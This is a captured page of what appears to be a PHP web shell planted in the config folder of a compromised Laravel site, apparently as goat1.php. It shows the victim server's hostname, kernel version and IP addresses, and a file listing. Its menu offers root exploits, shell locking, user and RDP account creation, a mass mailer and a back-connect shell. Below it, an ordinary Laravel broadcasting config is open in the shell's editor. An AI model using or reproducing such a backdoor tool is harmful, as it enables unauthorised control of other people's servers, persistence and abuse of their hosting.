Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.20
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo3.com /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
127
B
-r--r--r--
app.php
9.62
KB
-rw-r--r--
auth.php
3.71
KB
-rw-r--r--
broadcasting.php
1.56
KB
-rw-r--r--
cache.php
2.99
KB
-rw-r--r--
database.php
4.93
KB
-rw-r--r--
filesystems.php
2.07
KB
-rw-r--r--
fortify.php
4.74
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
hashing.php
1.53
KB
-rw-r--r--
jetstream.php
1.03
KB
-rw-r--r--
laravellocalization.php
40.45
KB
-rw-r--r--
logging.php
2.74
KB
-rw-r--r--
mail.php
4.57
KB
-rw-r--r--
meta.php
4.54
KB
-rw-r--r--
paypal.php
518
B
-rw-r--r--
permission.php
4.35
KB
-rw-r--r--
purifier.php
4.25
KB
-rw-r--r--
queue.php
2.65
KB
-rw-r--r--
sanctum.php
1.63
KB
-rw-r--r--
services.php
950
B
-rw-r--r--
session.php
6.81
KB
-rw-r--r--
user-verification.php
1.39
KB
-rw-r--r--
view.php
1.03
KB
-rw-r--r--
xss-filter.php
79
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : broadcasting.php
<?php return [ /* |-------------------------------------------------------------------------- | Default Broadcaster |-------------------------------------------------------------------------- | | This option controls the default broadcaster that will be used by the | framework when an event needs to be broadcast. You may set this to | any of the connections defined in the "connections" array below. | | Supported: "pusher", "redis", "log", "null" | */ 'default' => env('BROADCAST_DRIVER', 'null'), /* |-------------------------------------------------------------------------- | Broadcast Connections |-------------------------------------------------------------------------- | | Here you may define all of the broadcast connections that will be used | to broadcast events to other systems or over websockets. Samples of | each available type of connection are provided inside this array. | */ 'connections' => [ 'pusher' => [ 'driver' => 'pusher', 'key' => env('PUSHER_APP_KEY'), 'secret' => env('PUSHER_APP_SECRET'), 'app_id' => env('PUSHER_APP_ID'), 'options' => [ 'cluster' => env('PUSHER_APP_CLUSTER'), 'useTLS' => true, ], ], 'redis' => [ 'driver' => 'redis', 'connection' => 'default', ], 'log' => [ 'driver' => 'log', ], 'null' => [ 'driver' => 'null', ], ], ];
Close